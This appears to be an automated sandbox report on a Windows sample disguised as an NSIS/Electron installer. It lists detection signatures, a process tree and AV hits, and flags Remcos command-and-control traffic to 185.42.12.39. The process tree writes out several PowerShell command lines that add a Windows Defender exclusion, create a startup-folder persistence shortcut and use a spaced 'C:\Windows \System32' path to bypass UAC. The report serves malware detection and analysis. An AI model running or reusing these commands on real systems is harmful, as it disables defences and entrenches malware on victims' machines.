Windows Analysis Report
YoS6ZBCcUy.exe

Overview

General Information

Sample name: YoS6ZBCcUy.exe (renamed because original name is a hash value)
Original sample name: 9e19fd2499e9ffb9ca4eab08d9054a86.exe
Analysis ID: 1570242
MD5: 9e19fd2499e9ffb9ca4eab08d9054a86
SHA1: 198946086afa2544e8f86463f15fa321aa45f7e0
SHA256: 7fedcec3a38dec8650ae2f64271b19c01372881ce83f1fe4597f85b26c4a0732
Tags: exe user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Sigma detected: Powershell create lnk in startup
Sigma detected: TrustedPath UAC Bypass Pattern
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Delayed program exit found
Drops executables to the windows directory (C:\Windows) and starts them
Drops large PE files
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • YoS6ZBCcUy.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\YoS6ZBCcUy.exe" MD5: 9E19FD2499E9FFB9CA4EAB08D9054A86)
    • cmd.exe (PID: 7404 cmdline: "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq NSIS.exe" /FO csv | "C:\Windows\system32\find.exe" "NSIS.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7456 cmdline: tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • find.exe (PID: 7484 cmdline: "C:\Windows\system32\find.exe" "NSIS.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
  • NSIS.exe (PID: 7940 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • NSIS.exe (PID: 8176 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2 MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • cmd.exe (PID: 8184 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1020 cmdline: powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 2936 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2504 cmdline: powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • winSAT.exe (PID: 7232 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
        • winSAT.exe (PID: 7456 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
          • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7280 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • NSIS.exe (PID: 7448 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3 MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • cmd.exe (PID: 5468 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7692 cmdline: powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • winSAT.exe (PID: 1144 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
        • winSAT.exe (PID: 2700 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
          • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2656 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • Bginfo.exe (PID: 7864 cmdline: "C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe" /NOLICPROMPT /timer:300 MD5: 3AEF228FB7EE187160482084D36C9726)
  • NSIS.exe (PID: 3444 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • cmd.exe (PID: 940 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2672 cmdline: powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • NSIS.exe (PID: 3732 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2 MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • cmd.exe (PID: 7464 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4852 cmdline: powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • winSAT.exe (PID: 7636 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
        • winSAT.exe (PID: 1028 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
          • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6100 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • NSIS.exe (PID: 5624 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3 MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • NSIS.exe (PID: 6704 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8 MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
No configs have been found
No yara matches

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\winSAT.exe" , CommandLine: "C:\Windows \System32\winSAT.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\winSAT.exe, NewProcessName: C:\Windows \System32\winSAT.exe, OriginalFileName: C:\Windows \System32\winSAT.exe, ParentCommandLine: powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2504, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows \System32\winSAT.exe" , ProcessId: 7232, ProcessName: winSAT.exe
Source: File created, Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe, ProcessId: 7940, TargetFilename: C:\Windows \System32\version.dll
Source: File created, Author: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1020, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows \System32\winSAT.exe" , ParentImage: C:\Windows \System32\winSAT.exe, ParentProcessId: 7456, ParentProcessName: winSAT.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", ProcessId: 7280, ProcessName: powershell.exe
Source: Process started, Author: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows \System32\winSAT.exe" , ParentImage: C:\Windows \System32\winSAT.exe, ParentProcessId: 7456, ParentProcessName: winSAT.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", ProcessId: 7280, ProcessName: powershell.exe
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1020, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()", CommandLine: powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8184, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()", ProcessId: 1020, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe, ParentProcessId: 7940, ParentProcessName: NSIS.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"", ProcessId: 8184, ProcessName: cmd.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol

AV Detection

Source: C:\Users\user\AppData\Local\Temp\039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dll, ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll, ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll, ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll, ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll, ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Roaming\MyElectronApp\version.dll, ReversingLabs: Detection: 62%
Source: C:\Windows \System32\version.dll, ReversingLabs: Detection: 15%
Source: YoS6ZBCcUy.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exe, Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\31e24c48-f042-5745-a165-04e896e763b7
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exe, File created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exe, File created: C:\Users\user\AppData\Local\Programs\NSIS\LICENSE.electron.txt
Source: YoS6ZBCcUy.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb<: source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2147033936.0000000004B82000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ffmpeg.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2082003478.0000000004758000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2080858985.0000000004759000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb,q source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vulkan-1.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2197462818.0000000004B54000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2147240320.0000000004B70000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2074996101.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2077198025.0000000005DA0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000002.2201242233.0000000004B54000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2075174807.0000000004970000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: YoS6ZBCcUy.exe, 00000000.00000003.2080858985.0000000004759000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: electron.exe.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2078169826.00000000069A3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: libGLESv2.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2086278028.0000000004753000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll15\Release\Dll15.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vk_swiftshader.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2143596568.000000000475E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\s\Win32\Release\BGInfo.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exe, Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exe, Code function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exe, Code function: 0_2_00402868 FindFirstFileW,0_2_00402868
Source: C:\Windows \System32\winSAT.exe, Code function: 19_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,19_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exe, Code function: 22_2_00007FF780FD34C4 FindFirstFileW,GetLastError,FindClose,SetLastError,_CxxThrowException,22_2_00007FF780FD34C4
Source: C:\Windows \System32\winSAT.exe, Code function: 22_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,22_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exe, Code function: 22_2_00007FFE10251B68 FindFirstFileExW,22_2_00007FFE10251B68
Source: C:\Windows \System32\winSAT.exe, Code function: 22_2_00007FFE10251CEC FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_00007FFE10251CEC
Source: C:\Windows \System32\winSAT.exe, Code function: 31_2_00007FF780FD34C4 FindFirstFileW,GetLastError,FindClose,SetLastError,_CxxThrowException,31_2_00007FF780FD34C4
Source: C:\Windows \System32\winSAT.exe, Code function: 31_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,31_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exe, Code function: 31_2_00007FFDFFE453DC FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_00007FFDFFE453DC
Source: C:\Windows \System32\winSAT.exe, Code function: 31_2_00007FFDFFE45258 FindFirstFileExW,31_2_00007FFDFFE45258
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe, File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe, File opened: C:\Users\user\AppData\Local\Programs\NSIS\resources
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe, File opened: C:\Users\user\AppData\Local\Programs\NSIS
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe, File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe, File opened: C:\Users\user\AppData\Local\Programs

Networking

Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49754 -> 185.42.12.39:2404
Source: global traffic, TCP traffic: 192.168.2.4:49754 -> 185.42.12.39:2404
